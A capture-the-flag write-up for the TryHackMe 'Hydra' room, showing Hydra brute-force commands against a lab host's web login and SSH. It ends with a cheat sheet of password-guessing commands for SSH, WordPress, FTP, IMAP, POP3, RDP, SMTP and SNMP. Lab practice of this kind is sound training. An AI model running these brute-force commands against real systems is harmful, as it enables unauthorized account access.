Hydra-TryHackMe


This write-up covers the TryHackMe room named Hydra.
#1 Use Hydra to brute-force molly's web password. What is flag 1?
Use the following command to brute-force the web password:
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.75.16 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Now log in to the web page at http://10.10.75.16/login with molly's credentials, which we just cracked with Hydra.
Here we will find our first flag.
#2 Use Hydra to brute-force molly's SSH password. What is flag 2?
Now let's crack molly's SSH password using Hydra:
hydra -s 22 -v -q -l molly -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.75.16 ssh
-s PORT               if the service is on a different default port, define it here
-v / -V / -d          verbose mode / show login+pass for each attempt / debug mode
-q                    do not print messages about connection errors
-l LOGIN or -L FILE   login with LOGIN name, or load several logins from FILE
-p PASS  or -P FILE   try password PASS, or load several passwords from FILE
-e nsr                try "n" null password, "s" login as pass and/or "r" reversed login
-t TASKS              run TASKS number of connects in parallel per target (default: 16)
-w / -W TIME          wait time for a response (32) / between connects per thread (0)
Log in to the machine over SSH with molly's cracked credentials to get flag2.txt:
ssh molly@10.10.75.16
That's all for this room.
Here is a list of example commands for the most common protocols (modify them according to your needs):
Brute force SSH
=============
⇒ hydra -s 22 -v -q -L user.txt -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.10.10 ssh -V
⇒ hydra -l root -p admin 10.10.10.10 -t 4 ssh

Brute force HTTP POST Form
=======================
⇒ WordPress example:
hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=http%3A%2F%2F10.10.10.10%2Fwp-admin%2F&testcookie=1:F=ERROR"

⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"

⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

Brute Force FTP
=============
⇒ hydra -l user -P passlist.txt ftp://10.10.10.10

Brute Force IMAP
==============
⇒ hydra -L userlist.txt -p defaultpw imap://10.10.10.10/PLAIN

Brute Force POP3
==============
⇒ hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

Brute Force RDP
=============
⇒ hydra rdp://10.10.10.10/firstdomainname -l john -p doe

Brute Force SMTP
==============
⇒ hydra smtp-enum://10.10.10.10/vrfy -l john -p localhost

Brute Force SNMP
==============
⇒ hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ 10.10.10.10 snmp (SNMP v3)
⇒ hydra -P pass.txt -m 2 10.10.10.10 snmp (SNMP v2)
